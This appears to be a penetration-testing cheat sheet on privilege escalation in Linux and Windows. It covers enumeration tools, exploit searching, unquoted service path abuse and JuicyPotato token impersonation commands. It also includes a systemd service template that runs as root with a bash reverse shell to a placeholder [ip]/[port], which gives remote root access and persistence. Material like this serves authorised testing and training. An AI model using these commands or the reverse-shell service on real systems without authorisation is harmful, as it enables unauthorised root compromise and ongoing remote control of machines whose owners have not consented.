Privilege Escalation

Enumeration
Linux
Windows

linPEAS (linpeas.sh)

# Basic linpeas.sh usage
# tee copies its stdin to stdout and to the named file, so the output is both shown on screen and saved to log.txt
$ ./linpeas.sh | tee log.txt

winPEAS.exe

# run winPEAS.exe from the current directory
$ .\winPEAS.exe

Linux: find SUID files

# list regular files with the setuid bit set; 2>/dev/null discards permission-denied errors
$ find / -perm -4000 -type f 2>/dev/null

Windows Privilege Information

# show the privileges held by the current user
$ whoami /priv

Exploit Search

# SearchSploit
# update the local Exploit-DB database
$ searchsploit -u

# show searchsploit usage and options
$ searchsploit -h
# windows-exploit-suggester.py (wes.py)
# download the latest Microsoft security bulletin database (saved as a dated mssb.xlsx file)
$ ./windows-exploit-suggester.py --update

# match the target's systeminfo output against the bulletin database and list candidate exploits
$ ./windows-exploit-suggester.py --database [yyyy-mm-dd-mssb.xlsx] --systeminfo [systeminfo.txt]

Linux systemctl

# Template service file
# * ExecStart must use an absolute path to the binary
# systemctl enable /absolute/path/to/xxxxx.service (enable accepts a full path to the unit file)
# systemctl start xxxxx
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/[ip]/[port] 0>&1'

[Install]
WantedBy=multi-user.target

Windows Unquoted Service Path Vulnerability

# enumerate services
$ powershell -c "Get-Service"

$ sc qc [serviceName]

# list non-Microsoft services with an automatic start mode whose path is unquoted
# (the findstr stages keep auto-start entries, drop C:\windows paths, then drop paths that already contain a quote;
#  wmic is deprecated on current Windows, and Get-CimInstance Win32_Service exposes the same Name/DisplayName/PathName/StartMode fields)
$ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """
# exploit: restart the service (stop, then start)
$ sc stop  [serviceName]
$ sc start [serviceName]

Windows Token Impersonation

# JuicyPotato
# https://github.com/ohpe/juicy-potato
$ JuicyPotato.exe -l [port] -p C:\[program path] -t * -c [CLSID]

# alternatively, point -p at a .bat file that runs the command
$ JuicyPotato.exe -l [port] -p C:\[.bat path] -t * -c [CLSID]